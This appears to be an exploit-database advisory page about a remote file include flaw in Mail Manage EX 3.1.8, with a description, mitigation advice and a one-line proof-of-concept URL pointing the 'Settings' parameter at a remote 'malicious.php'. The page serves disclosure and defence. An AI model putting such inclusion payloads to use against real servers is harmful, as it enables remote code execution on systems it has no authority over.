header-logo
Suggest Exploit
vendor:
Mail Manage EX
by:
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Mail Manage EX
Affected Version From: Mail Manage EX 3.1.8
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Mail Manage EX Remote File Include Vulnerability

The Mail Manage EX application is prone to a remote file include vulnerability. This vulnerability occurs due to insufficient sanitization of user-supplied data. A remote attacker can exploit this issue by including arbitrary PHP files located on remote servers.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user-supplied data before using it in file inclusion operations. Additionally, restricting access to remote servers and implementing strong input validation can help prevent such attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10457/info

Mail Manage EX is reportedly prone to a remote file include vulnerability. This vulnerability results from insufficient sanitization of user-supplied data and may allow remote attackers to include arbitrary PHP files located on remote servers.

This issue was discovered in Mail Manage EX 3.1.8. It is possible that previous versions are affected as well. 

http://www.example.com/mail/mmex.php?Settings=http://www.example.com/malicious.php